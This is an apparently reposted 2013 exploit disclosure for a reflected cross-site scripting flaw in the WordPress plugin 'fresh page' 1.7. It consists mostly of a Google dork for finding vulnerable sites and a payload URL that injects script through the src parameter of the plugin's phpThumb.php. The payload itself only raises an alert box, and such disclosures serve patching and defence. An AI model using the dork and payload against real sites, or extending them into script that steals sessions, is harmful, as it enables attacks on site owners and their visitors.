facebook facebook twitter rss

Wordpress Plugins - fresh page 1.7 Cross Site Scripting Vulnerability

Author: AtT4CKxT3rR0r1ST , Published: 24-05-2013
Wordpress Plugins - fresh page 1.7 Cross Site Scripting Vulnerability
==========================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Version : 1.7
.:. Dork : inurl:"/wp-content/plugins/fresh-page/"
####################################################################
===[ Exploit ]===


Cross-Site Scripting :

site.com/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src=Xss Code


site.com/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src=</script><script>alert(/AXT/);</script>



####################################################################

Like us on Facebook :